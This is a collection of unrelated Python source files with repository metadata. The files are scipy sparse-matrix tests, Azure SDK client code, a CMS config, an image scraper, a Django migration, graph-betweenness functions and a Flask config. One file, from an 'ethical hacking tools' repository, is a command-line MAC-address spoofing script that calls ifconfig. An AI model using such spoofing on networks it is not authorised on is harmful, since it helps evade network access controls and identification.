assert_array_equal(mat,coo.todense())
def test_constructor3(self):
"""empty matrix"""
coo = coo_matrix( (4,3) )
assert_array_equal(coo.shape,(4,3))
assert_array_equal(coo.row,[])
assert_array_equal(coo.col,[])
assert_array_equal(coo.data,[])
assert_array_equal(coo.todense(),zeros((4,3)))
def test_constructor4(self):
"""from dense matrix"""
mat = array([[0,1,0,0],
[7,0,3,0],
[0,4,0,0]])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat)
#upgrade rank 1 arrays to row matrix
mat = array([0,1,0,0])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat.reshape(1,-1))
class TestDIA(_TestCommon, _TestArithmetic, TestCase):
spmatrix = dia_matrix
def test_constructor1(self):
D = matrix([[1, 0, 3, 0],
[1, 2, 0, 4],
[0, 2, 3, 0],
[0, 0, 3, 4]])
data = np.array([[1,2,3,4]]).repeat(3,axis=0)
offsets = np.array([0,-1,2])
assert_equal(dia_matrix( (data,offsets), shape=(4,4)).todense(), D)
class TestBSR(_TestCommon, _TestArithmetic, _TestInplaceArithmetic, TestCase):
spmatrix = bsr_matrix
def test_constructor1(self):
"""check native BSR format constructor"""
indptr = array([0,2,2,4])
indices = array([0,2,2,3])
data = zeros((4,2,3))
data[0] = array([[ 0, 1, 2],
[ 3, 0, 5]])
data[1] = array([[ 0, 2, 4],
[ 6, 0, 10]])
data[2] = array([[ 0, 4, 8],
[12, 0, 20]])
data[3] = array([[ 0, 5, 10],
[15, 0, 25]])
A = kron( [[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]] )
Asp = bsr_matrix((data,indices,indptr),shape=(6,12))
assert_equal(Asp.todense(),A)
#infer shape from arrays
Asp = bsr_matrix((data,indices,indptr))
assert_equal(Asp.todense(),A)
def test_constructor2(self):
"""construct from dense"""
#test zero mats
for shape in [ (1,1), (5,1), (1,10), (10,4), (3,7), (2,1)]:
A = zeros(shape)
assert_equal(bsr_matrix(A).todense(),A)
A = zeros((4,6))
assert_equal(bsr_matrix(A,blocksize=(2,2)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
A = kron( [[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]] )
assert_equal(bsr_matrix(A).todense(),A)
assert_equal(bsr_matrix(A,shape=(6,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(1,1)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,6)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(3,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(6,12)).todense(),A)
A = kron( [[1,0,2,0],[0,1,0,0],[0,0,0,0]], [[0,1,2],[3,0,5]] )
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
def test_eliminate_zeros(self):
data = kron([1, 0, 0, 0, 2, 0, 3, 0], [[1,1],[1,1]]).T
data = data.reshape(-1,2,2)
indices = array( [1, 2, 3, 4, 5, 6, 7, 8] )
indptr = array( [0, 3, 8] )
asp = bsr_matrix( (data, indices, indptr), shape=(4,20) )
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3*4)
assert_array_equal(asp.todense(),bsp.todense())
def test_bsr_matvec(self):
A = bsr_matrix( arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5) )
x = arange(A.shape[1]).reshape(-1,1)
assert_equal(A*x, A.todense()*x)
def test_bsr_matvecs(self):
A = bsr_matrix( arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5) )
x = arange(A.shape[1]*6).reshape(-1,6)
assert_equal(A*x, A.todense()*x)
if __name__ == "__main__":
run_module_suite()
|
[
"georgios@kaleadis.de"
] |
georgios@kaleadis.de
|
7afb0ea84644b1bf6afbc0de0954989346d9d818
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2018_05_01/operations/_deployment_operations_operations.py
|
9b382ad50a49f1db1c0b2bf544db7ab840f5b10d
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507
| 2020-09-04T15:48:52
| 2020-09-04T15:48:52
| 205,457,088
| 1
| 2
|
MIT
| 2020-06-16T16:38:15
| 2019-08-30T21:08:55
|
Python
|
UTF-8
|
Python
| false
| false
| 15,317
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class DeploymentOperationsOperations(object):
"""DeploymentOperationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.resources.v2018_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get_at_subscription_scope(
self,
deployment_name, # type: str
operation_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.DeploymentOperation"
"""Gets a deployments operation.
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param operation_id: The ID of the operation to get.
:type operation_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeploymentOperation, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperation"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
# Construct URL
url = self.get_at_subscription_scope.metadata['url'] # type: ignore
path_format_arguments = {
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'operationId': self._serialize.url("operation_id", operation_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DeploymentOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_at_subscription_scope.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Resources/deployments/{deploymentName}/operations/{operationId}'} # type: ignore
def list_at_subscription_scope(
self,
deployment_name, # type: str
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.DeploymentOperationsListResult"]
"""Gets all deployments operations for a deployment.
:param deployment_name: The name of the deployment with the operation to get.
:type deployment_name: str
:param top: The number of results to return.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeploymentOperationsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperationsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperationsListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_at_subscription_scope.metadata['url'] # type: ignore
path_format_arguments = {
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('DeploymentOperationsListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_at_subscription_scope.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Resources/deployments/{deploymentName}/operations'} # type: ignore
def get(
self,
resource_group_name, # type: str
deployment_name, # type: str
operation_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.DeploymentOperation"
"""Gets a deployments operation.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param operation_id: The ID of the operation to get.
:type operation_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeploymentOperation, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperation"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'operationId': self._serialize.url("operation_id", operation_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DeploymentOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/deployments/{deploymentName}/operations/{operationId}'} # type: ignore
def list(
self,
resource_group_name, # type: str
deployment_name, # type: str
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.DeploymentOperationsListResult"]
"""Gets all deployments operations for a deployment.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment with the operation to get.
:type deployment_name: str
:param top: The number of results to return.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeploymentOperationsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperationsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperationsListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('DeploymentOperationsListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/deployments/{deploymentName}/operations'} # type: ignore
|
[
"noreply@github.com"
] |
YijunXieMS.noreply@github.com
|
1bb07661e2f145c524b06a23863cf532e2036f4e
|
28f8a21b5d4b961477f105bddeb36654a6cc3d57
|
/PhysicsTools/PatAlgos/test/patTuple_fastsim_cfg.py
|
b6fe834b06fb3292157515ba9c9effe49b9100d3
|
[] |
no_license
|
fcostanz/NTupler
|
316be24ca3c8b9784def7e0deea3fd5ead58f72e
|
adc566a93ad4973fe61a1a9a24ceaabc3973a7ed
|
refs/heads/master
| 2016-09-06T03:57:21.982267
| 2014-02-17T10:01:14
| 2014-02-17T10:01:14
| 16,286,291
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,059
|
py
|
## import skeleton process
from PhysicsTools.PatAlgos.patTemplate_cfg import *
## let it run
process.p = cms.Path(
process.patDefaultSequence
)
## ------------------------------------------------------
# In addition you usually want to change the following
# parameters:
## ------------------------------------------------------
#
# process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions)
# ##
# process.source.fileNames = ... ## (e.g. 'file:AOD.root')
# ##
process.maxEvents.input = 10
# ##
# process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py)
# ##
process.out.fileName = 'patTuple_fastsim.root'
# ##
# process.options.wantSummary = False ## (to suppress the long output at the end of the job)
|
[
"fcost@nafhh-cms02.desy.de"
] |
fcost@nafhh-cms02.desy.de
|
c73b83f30926c4562ba946d153ecae54b4d5eb9c
|
661b81143e1d99c2f2bad8dc78c6a5830667d47e
|
/skriptid/scraper_mushroomworld.py
|
eb18ff02a17e794f63743d317d05fc87e5279e88
|
[] |
no_license
|
andry1001/seenetuvastaja
|
764405b78b824c5350c72f9fa4db193881dbe8d5
|
d110eb3790e2c09efcffa8d08662e9cff3908abb
|
refs/heads/master
| 2020-05-18T06:13:01.899127
| 2019-09-07T10:47:37
| 2019-09-07T10:47:37
| 184,227,476
| 0
| 0
| null | null | null | null |
WINDOWS-1252
|
Python
| false
| false
| 2,103
|
py
|
###########################################################################################################################
# skripti kirjutades on aluseks võetud kood järgnevatelt lehekülgedelt: #
# https://stackoverflow.com/questions/18408307/how-to-extract-and-download-all-images-from-a-website-using-beautifulsoup #
# #
# Järgnev koodilõik korjab andmeid mushroom.world andmebaasist. #
# #
###########################################################################################################################
import os
import re
import requests
from bs4 import BeautifulSoup
labels = []
BASEDIR = ".\ANDMED"
for SUBDIR in os.listdir(BASEDIR):
path = os.path.join(BASEDIR, SUBDIR)
extracted = os.path.basename(os.path.normpath(path))
label = extracted.lower()
labels.append(label)
BASEURL = 'http://www.mushroom.world/show?n='
for label in labels:
new_label = label.replace("_", "-")
URL = BASEURL + new_label
response = requests.get(URL)
soup = BeautifulSoup(response.text, 'html.parser')
img_tags = soup.find_all('img')
urls = [img['src'] for img in img_tags]
for url in urls:
try:
mod_url = "http://www.mushroom.world" + url.split("..")[1]
filename = re.search(r'/([\w_-]+[.](JPG|GIF|PNG))$', mod_url)
new_filename = filename.group(1)
new_filename = BASEDIR + '\\' + label + '\\' + new_filename
with open(new_filename, 'wb') as f:
if 'http' not in mod_url:
url = '{}{}'.format(URL, mod_url)
response = requests.get(mod_url)
f.write(response.content)
f.close()
except:
print(label)
|
[
"noreply@github.com"
] |
andry1001.noreply@github.com
|
cf67ea891aa1db6ec1100a61523886a37e8b7585
|
5c929ec2036ff04dbaaa78a5939380095b1075b9
|
/archiv/migrations/0037_usecase_custom_layer.py
|
5bdb64a491ee0bc035bde96aff97179e70841e78
|
[
"MIT"
] |
permissive
|
acdh-oeaw/mmp
|
9c0535129446123e32ce5a104447b7432b4e7e05
|
5381aa97757c456d0ce4f68137f5287e57376629
|
refs/heads/master
| 2023-04-15T06:26:25.605304
| 2023-03-28T12:14:43
| 2023-03-28T12:14:43
| 334,097,604
| 3
| 0
|
MIT
| 2023-03-28T12:14:45
| 2021-01-29T09:32:19
|
Python
|
UTF-8
|
Python
| false
| false
| 568
|
py
|
# Generated by Django 3.2.9 on 2022-06-09 05:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archiv', '0036_spatialcoverage_show_labels'),
]
operations = [
migrations.AddField(
model_name='usecase',
name='custom_layer',
field=models.CharField(blank=True, help_text="This name needs to match a specific layer name, e.g '800' to load a layer '800'", max_length=250, null=True, verbose_name='Name of additional Layer'),
),
]
|
[
"peter.andorfer@oeaw.ac.at"
] |
peter.andorfer@oeaw.ac.at
|
49292474819489ee394693df757244bb7466aee7
|
1426a4f8b67e32394613e89802e04611d5d777fe
|
/try_baike1.py
|
b10a5b36057c2f81b28f04b02c1d5c256e43ca53
|
[] |
no_license
|
HuaienYao/python-crawler
|
ea62ed920d52ffacfabe5a919dee62b61e3147c5
|
630e3f92436f1ba8b470d3f30872759da9bf53ae
|
refs/heads/master
| 2020-04-19T22:47:39.041827
| 2019-02-01T08:43:58
| 2019-02-01T08:43:58
| 168,479,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 412
|
py
|
#本代码是爬百度百科的小实验
from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
import random
#设置起始url
base_url = "https://baike.baidu.com"
his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]
url = base_url + his[-1]
html = urlopen(url).read().decode('utf-8')
soup = BeautifulSoup(html,features='lxml')
print(soup.find_all('h1').get_text(),'url:',his[-1])
|
[
"wyane.yia@gmail.com"
] |
wyane.yia@gmail.com
|
bf8afdc6a17a89cceb0f8505c726252ddb799c71
|
30c8de06d3181d53cc2549cca3ae3363142793ed
|
/adaptable networks/experiments/algorithms/importance/betweenness_centrality.py
|
bcd7c5af0631a7f11e1dcc15bb9abfcfbcd20829
|
[] |
no_license
|
sanket-patil/Complex-Networks
|
6ac6d431958b288c82c54ec08c1f0e8533bc6c1a
|
8d99f23000ad994032a846bdbb84daa948cfa460
|
refs/heads/master
| 2021-01-13T07:29:40.179392
| 2013-01-10T04:37:52
| 2013-01-10T04:37:52
| 3,737,590
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,867
|
py
|
''' Computes the betweenness centrality measures. '''
import algorithms.paths.paths
def getNodeBetweennessSequence(gr = None, nl = None, apsp = None):
betweenness = {}
plist = apsp
nodes = nl
if gr:
nodes = gr.getNodeList()
plist = algorithms.paths.paths.getAPSP(gr, allsp = True)
elif not nodes or not plist:
return None
for v in nodes:
betweenness[v] = 0.0
for v in betweenness.keys():
for s in betweenness.keys():
if s == v:
continue
for t in betweenness.keys():
if t == v or t == s:
continue
froms = plist[s]
thru = float(froms.getNumShortestPathsThroughNode(v, s, t))
betn = float(froms.getNumShortestPathsBetween(s, t))
incr = 0.0
if not betn == 0.0:
incr = thru/betn
betweenness[v] += incr
return betweenness
def getNodeBetnSeq(gr = None, nl = None, apsp = None):
nbseq = getNodeBetweennessSequence(gr, nl, apsp)
return [v for v in nbseq.values()]
def getNodeBetweennessDistribution(gr = None, nl = None, apsp = None):
betweenness = getNodeBetweennessSequence(gr, nl, apsp)
total = sum([v for v in betweenness.values()])
if total:
for k, v in betweenness.items():
betweenness[k] = v/total
return betweenness
def getNodeBetnDist(gr = None, nl = None, apsp = None):
nbdist = getNodeBetweennessDistribution(gr, nl, apsp)
return [v for v in nbdist.values()]
def getNodeBetweenness(gr, nd):
betweenness = 0.0
total = 0.0
plist = algorithms.paths.apsp.getAPSP(gr)
nodes = [v.name for v in gr.getNodes()]
for s in nodes and s is not v:
for t in nodes and t is not v and t is not s:
betweenness += plist.getNumShortestPathsThroughNode(v, s, t)/plist.getNumShortestPathsBetween(s, t)
total += betweenness
betweenness[k] = v/total
return betweenness
def getHighestNodeBetweenness(gr = None, nl = None, apsp = None):
return max(getNodeBetnSeq(gr, nl, apsp))
def getNodeWithMaxBetweenness(gr = None, nl = None, apsp = None):
nbseq = getNodeBetweennessSequence(gr, nl, apsp)
return max([(nbseq[k],k) for k in nbseq])[1]
def getAverageNodeBetweenness(gr = None, nl = None, apsp = None):
if gr:
return sum(getNodeBetnSeq(gr))/float(gr.getNumNodes())
if nl and apsp:
return sum(getNodeBetnSeq(gr, nl, apsp))/float(len(nl))
return -1
def getNormalizedHighestNodeBetweenness(gr = None, nl = None, apsp = None):
return max(getNodeBetnDist(gr, nl, apsp))
def getNormalizedAverageNodeBetweenness(gr = None, nl = None, apsp = None):
if gr:
return 1.0/float(gr.getNumNodes())
if nl and apsp:
return 1.0/float(len(nl))
return -1
def getNodeBetweennessSkew(gr = None, nl = None, apsp = None):
nbseq = getNodeBetnSeq(gr, nl, apsp)
maxbetn = max(nbseq)
n = 0
if gr:
n = float(gr.getNumNodes())
else:
n = float(len(nl))
avbetn = sum(nbseq)/n
return maxbetn - avbetn
def getNormalizedNodeBetweennessSkew(gr = None, nl = None, apsp = None):
nbdist = getNodeBetnDist(gr, nl, apsp)
maxbetn = max(nbdist)
n = 0
if gr:
n = float(gr.getNumNodes())
else:
n = float(len(nl))
avbetn = 1.0/n
return maxbetn - avbetn
def getEdgeBetweennessSequence(gr = None, nl = None, el = None, apsp = None):
betweenness = {}
plist = apsp
edges = el
nodes = nl
if gr:
nodes = gr.getNodeList()
edges = gr.getEdgeList()
plist = algorithms.paths.paths.getAPSP(gr, allsp = True)
elif not edges or not nodes or not plist:
return None
for ed in edges:
betweenness[ed] = 0.0
for s in nodes:
for t in nodes:
if s == t:
continue
for ed in betweenness.keys():
froms = plist[s]
thru = float(froms.getNumShortestPathsThroughEdge(ed, s, t))
betn = float(froms.getNumShortestPathsBetween(s, t))
incr = 0
if not thru == 0.0 and not betn == 0.0:
incr = thru/betn
betweenness[ed] += incr
return betweenness
def getEdgeBetnSeq(gr = None, nl = None, el = None, apsp = None):
edbseq = getEdgeBetweennessSequence(gr, nl, el, apsp)
return [v for v in edbseq.values()]
def getEdgeBetweennessDistribution(gr = None, nl = None, el = None, apsp = None):
betweenness = getEdgeBetweennessSequence(gr, nl, el, apsp)
total = sum([v for v in betweenness.values()])
for k, v in betweenness.items():
betweenness[k] = v/total
return betweenness
def getEdgeBetnDist(gr = None, nl = None, el = None, apsp = None):
edbdist = getEdgeBetweennessDistribution(gr, nl, el, apsp)
return [v for v in edbdist.values()]
def getEdgeBetweenness(gr, ed):
pass
def getHighestEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
return max(getEdgeBetnSeq(gr, nl, el, apsp))
def getEdgeWithMaxBetweenness(gr = None, nl = None, el = None, apsp = None):
ebseq = getEdgeBetweennessSequence(gr, nl, el, apsp)
return max([(ebseq[k],k) for k in ebseq])[1]
def getAverageEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
if gr:
return sum(getEdgeBetnSeq(gr))/float(gr.getNumEdges())
if nl and el and apsp:
return sum(getEdgeBetnSeq(gr, nl, el, apsp))/float(len(el))
return -1
def getNormalizedHighestEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
return max(getEdgeBetnDist(gr, nl, el, apsp))
def getNormalizedAverageEdgeBetweenness(gr = None, nl = None, el = None, apsp = None):
if gr:
return 1.0/float(gr.getNumEdges())
if nl and el and apsp:
return 1.0/float(len(el))
return -1
def getEdgeBetweennessSkew(gr = None, nl = None, el = None, apsp = None):
edbseq = getEdgeBetnSeq(gr, nl, el, apsp)
maxbetn = max(edbseq)
ne = 0
if gr:
ne = float(gr.getNumEdges())
else:
ne = float(len(el))
avbetn = sum(edbseq)/ne
return maxbetn - avbetn
def getNormalizedEdgeBetweennessSkew(gr = None, nl = None, el = None, apsp = None):
edbdist = getEdgeBetnDist(gr, nl, el, apsp)
maxbetn = max(edbdist)
ne = 0
if gr:
ne = float(gr.getNumEdges())
else:
ne = float(len(el))
avbetn = 1.0/ne
return maxbetn - avbetn
if __name__ == '__main__':
print __doc__
|
[
"sanketvpatil@gmail.com"
] |
sanketvpatil@gmail.com
|
6291ac45390f72142bdf12dfd36524ada4640f4a
|
b8ef2769bf6d9159457faa642f57c91a01533ef0
|
/1 mac_changer/macchanger-5.py
|
0ccc2c5350479b116ff7f2adf3745a8aa29cf3c1
|
[] |
no_license
|
C-BOE86/Python-Ethical-Hacking-Tools
|
096d9252096536164a18c6449d105d3807415e51
|
0ca3dd29bc35722e8e6a55a2a6d56036dccb856b
|
refs/heads/master
| 2022-03-23T04:29:30.215390
| 2019-12-03T19:57:57
| 2019-12-03T19:57:57
| 198,090,999
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
#!/usr/bin/python
'''
Getting the value for the interface and mac addr to a variable and
then pass the value to the command directly
secure code
handling user input if the user put ; or && to execute another command
it will stop by removin the shell=True single string commmand
rather we remove the shell=True and exec the computer and get command
in a list variable one by one which will avoid this user-input manipulation
'''
'''
we can give value in as a argument in a command line using sys modules
or with an option with help and switch we use optparse module
python macchanger.py --interface wlan0 --mac 11:aa:dd:ff:gg:hh
python macchanger.py --help to print help'''
import subprocess
import optparse
parser=optparse.OptionParser() #init the parser object
parser.add_option("-i","--interface",dest="interface",help="Interface to change the mac address")
#adding the options like -i or --interface switches, dest this where the passed values get saved and help display the help msg python macchanger.py --help
parser.add_option("-m","--mac",dest="new_mac",help="add new mac address")
(options,arguments)=parser.parse_args()
#the funtion returns a value to this 2 varible options and arguments
#options is nobut the wlan0 and aa:bb:cc:dd:ee:ff
#arguments is nothingbut --interface and --mac or -i and -m
interface = options.interface
macaddr = options.new_mac
#options contains the value to get the value we call options.interface and options.new_mac
subprocess.call(["ifconfig",interface,"down"])
subprocess.call(["ifconfig",interface,"hw","ether",macaddr])
subprocess.call(["ifconfig",interface,"up"])
print "[+] Changing Mac Address of Interface %s to %s"%(interface,macaddr)
|
[
"noreply@github.com"
] |
C-BOE86.noreply@github.com
|
dc1aca49e98ba1198a880584be42f9758fdd5ebd
|
bd435e3ff491d13c3cb1ffcf34771ac1c80f7859
|
/code/flask/01/app/config.py
|
82b45957f1f35cffc8f4752f0c8de4f86285b81c
|
[] |
no_license
|
luningcowboy/PythonTutorial
|
8f4b6d16e0fad99a226540a6f12639ccdff402ff
|
9024efe8ed22aca0a1271a2c1c388d3ffe1e6690
|
refs/heads/master
| 2021-06-16T23:03:22.153473
| 2020-04-09T13:52:12
| 2020-04-09T13:52:12
| 187,571,993
| 0
| 0
| null | 2021-03-25T23:02:36
| 2019-05-20T05:16:13
|
Python
|
UTF-8
|
Python
| false
| false
| 405
|
py
|
CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess'
OPENID_PROVIDERS = [
{ 'name': 'Google', 'url':'https://www.google.com/accounts/o8/id'},
{ 'name': 'Yahoo', 'url': 'https://me.yahoo.com' },
{ 'name': 'AOL', 'url': 'http://openid.aol.com/<username>' },
{ 'name': 'Flickr', 'url': 'http://www.flickr.com/<username>' },
